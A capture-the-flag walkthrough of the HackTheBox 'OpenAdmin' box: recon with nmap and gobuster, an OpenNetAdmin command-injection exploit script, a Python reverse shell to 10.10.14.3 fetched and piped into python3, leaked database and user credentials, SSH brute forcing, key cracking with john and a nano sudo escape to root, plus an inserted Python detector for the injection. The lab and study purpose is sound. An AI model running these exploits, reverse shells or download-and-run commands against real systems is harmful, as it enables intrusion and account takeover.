An easy Linux box from HackTheBox, using an exposed admin panel for initial access, then pivoting around between users, until getting root with an SUID binary.

Open Admin

Recon

Starting with nmap

nmap -sV -sC -oA initial 10.10.10.171
PORT   STATE SERVICE VERSION  
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)  
| ssh-hostkey:    
|   2048 4b:98:df:85:d1:7e:f0:3d:da:48:cd:bc:92:00:b7:54 (RSA)  
|   256 dc:eb:3d:c9:44:d1:18:b1:22:b4:cf:de:bd:6c:7a:54 (ECDSA)  
|_  256 dc:ad:ca:3c:11:31:5b:6f:e6:a4:89:34:7c:9b:e5:50 (ED25519)  
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))  
|_http-title: Apache2 Ubuntu Default Page: It works  
|_http-server-header: Apache/2.4.29 (Ubuntu)  
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Also ran an all-ports scan with the -p- option in the background while working on the box, but nothing new showed up

Searching for Apache 2.4.29 on Launchpad, find that the box is relatively new, running Ubuntu Bionic

Navigating to the HTTP server on port 80, all that it shows is the default Apache page

Welp, let's hit it with gobuster

gobuster dir -u 10.10.10.171 -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt

Find a few interesting directories, /music, /artwork and /sierra

Of these three, /music has a login button that immediately dumps you into an administrator panel called OpenNetAdmin

Exploitation

For this particular version, there is a command injection exploit abusing the system's ping functionality

#!/bin/bash

# Usage: ./script.sh http://TARGET/ona/
URL="${1}"
while true; do
  echo -n "$ "; read -r cmd
  # The command is injected into the ip=> argument of the ping tooltip; the BEGIN/END
  # markers let sed cut the command output out of the HTML that comes back
  curl --silent -d "xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;echo \"BEGIN\";${cmd};echo \"END\"&xajaxargs[]=ping" "${URL}" | sed -n -e '/BEGIN/,/END/ p' | tail -n +2 | head -n -1
done

The above script (given the URL when started, and then the command you want to inject at its prompt) will execute that command on the server
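As an added defensive check (not part of the original post): the injection works because the ip=> argument of the ping tooltip reaches a shell unvalidated, so a request inspector can flag any ping call whose target is not a plain address or hostname. The request bodies below are constructed from the shape of the exploit's curl call, and the function names are my own.

```python
"""Flag OpenNetAdmin xajax 'ping' requests whose target could not be an IP or hostname."""
import re
from urllib.parse import unquote_plus

# Characters that let the ip=> value escape the ping command line
SHELL_META = re.compile(r"[;&|`$(){}<>\n]")
# A legitimate ping target: dotted IPv4 or a hostname
VALID_TARGET = re.compile(r"^(?:\d{1,3}(?:\.\d{1,3}){3}|[A-Za-z0-9.-]+)$")

def parse_body(body):
    """Minimal form decoder: split on '&' only, so a ';' inside a value survives as data."""
    pairs = []
    for part in body.split("&"):
        if not part:
            continue
        key, _, value = part.partition("=")
        pairs.append((unquote_plus(key), unquote_plus(value)))
    return pairs

def extract_ping_target(body):
    """Return the ip=> value of a window_submit/ping call, or None if this is not one."""
    pairs = parse_body(body)
    args = [v for k, v in pairs if k == "xajaxargs[]"]
    if ("xajax", "window_submit") not in pairs or "ping" not in args:
        return None
    for arg in args:
        if arg.startswith("ip=>"):
            return arg[len("ip=>"):]
    return None

def classify_request(body):
    """Return 'not_ping', 'benign' or 'injection' for one POST body."""
    target = extract_ping_target(body)
    if target is None:
        return "not_ping"
    if SHELL_META.search(target) or not VALID_TARGET.match(target):
        return "injection"
    return "benign"

# Constructed sample bodies: the exploit's request shape, a normal ping, and an unrelated call
INJECTED_BODY = ('xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips'
                 '&xajaxargs[]=ip%3D%3E;echo "BEGIN";id;echo "END"&xajaxargs[]=ping')
BENIGN_BODY = ('xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips'
               '&xajaxargs[]=ip%3D%3E10.10.10.1&xajaxargs[]=ping')
OTHER_BODY = 'xajax=window_submit&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E10.10.10.1&xajaxargs[]=other'

if __name__ == "__main__":
    for body in (INJECTED_BODY, BENIGN_BODY, OTHER_BODY):
        print(classify_request(body), repr(extract_ping_target(body)))
```

Apache does not log POST bodies by default, so this is meant for a request-inspection layer (a WAF audit log or a reverse proxy hook) rather than access.log.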

Starting up a netcat session on port 1234, the payload will be a reverse shell

Copying the exploit into ona_inject.sh, but adding -x http://127.0.0.1:8080 to the curl call to send the exploit's requests through Burp Proxy (just to make sure it's working)

#!/bin/bash

URL="${1}"
while true; do
  echo -n "$ "; read -r cmd
  curl -x 'http://127.0.0.1:8080' --silent -d "xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;echo \"BEGIN\";${cmd};echo \"END\"&xajaxargs[]=ping" "${URL}" | sed -n -e '/BEGIN/,/END/ p' | tail -n +2 | head -n -1
done

And run it like so

./ona_inject.sh 10.10.10.171/ona/

Really weird box, hard to get reverse shell on it

Need to use this Python reverse shell (the usual one-liner minus the python -c at the front), saved into a file called rev.py

import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.3",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);

Fetch it from the target with curl (serving it from a simple HTTP server on the attacking machine), and pipe it into python3 on the target

curl 10.10.14.3:8000/rev.py | python3

Run linPEAS.sh by wget'ing it from a simple HTTP server; don't really find anything besides two user names, jimmy and joanna

Looking through the config files under /opt/ona/www/ recursively with grep -R, find a file called database_settings.inc.php which leaks the MySQL user and password

'db_login' => ona_sys
'db_passwd' => n1nj4W4rri0R!

And log in to the MySQL instance

mysql -u ona_sys -p

Running show databases

mysql> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| ona_default        |
+--------------------+
2 rows in set (0.00 sec)

Navigating into ona_default

use ona_default;
show tables;

There is a users table; running "describe users;" gives

+----------+------------------+------+-----+-------------------+-----------------------------+
| Field    | Type             | Null | Key | Default           | Extra                       |
+----------+------------------+------+-----+-------------------+-----------------------------+
| id       | int(10) unsigned | NO   | PRI | NULL              | auto_increment              |
| username | varchar(32)      | NO   | UNI | NULL              |                             |
| password | varchar(64)      | NO   |     | NULL              |                             |
| level    | int(4)           | NO   |     | 0                 |                             |
| ctime    | timestamp        | NO   |     | CURRENT_TIMESTAMP | on update CURRENT_TIMESTAMP |
| atime    | datetime         | YES  |     | NULL              |                             |
+----------+------------------+------+-----+-------------------+-----------------------------+

Then printing the user info with “select id,username,password from users;”

+----+----------+----------------------------------+
| id | username | password                         |
+----+----------+----------------------------------+
|  1 | guest    | 098f6bcd4621d373cade4e832627b4f6 |
|  2 | admin    | 21232f297a57a5a743894a0e4a801fc3 |
+----+----------+----------------------------------+

Running the hashes into hash.org, get the creds

guest:test admin:admin

But these are just creds for the OpenNetAdmin instance

Let's combine all the passwords we have into a list and try each one against each of the known users

Passwords: admin test n1nj4W4rri0R!

Users: jimmy joanna root

Using a tool called medusa, let's try to SSH into the box as each user

medusa -h 10.10.10.171 -U users.txt -P pass.txt -M ssh

We get in as jimmy!

His creds are jimmy:n1nj4W4rri0R!

Looking into the (previously locked to us) home directory, it's empty, bummer

Let's try finding all the files owned by jimmy with

find / -user jimmy 2>/dev/null

Find some curious PHP scripts, one called main.php in /var/www/internal/

Cat'ing it, find that it just grabs joanna's SSH key

Maybe there is another webserver running?

ss -lntp

Find there is a process listening on port 52846, bound to localhost only

So to see joanna's SSH key, need to request the PHP script with curl as jimmy

curl 127.0.0.1:52846/main.php

And it prints the SSH key out. Unfortunately, a passphrase is required for the key when you try to SSH into the box as joanna

Gotta crack it with john

# Convert the key into a hash format john can work on
python ssh2john.py joanna_id_rsa > joanna_id_rsa.hash

Finally, let’s use john and rockyou.txt to try and crack the SSH Key.

john joanna_id_rsa.hash --wordlist=rockyou.txt

The passphrase is “bloodninjas”

Now can SSH in as joanna, and find the user flag

Running sudo -l, find that joanna can run /bin/nano on /opt/priv as root without a password

Looking at GTFOBins, can get a shell through nano by editing /opt/priv, the only file you can run it on with sudo

sudo /bin/nano /opt/priv

Then following the GTFOBins instructions inside nano

nano
^R^X
reset; sh 1>&0 2>&0

And you're root!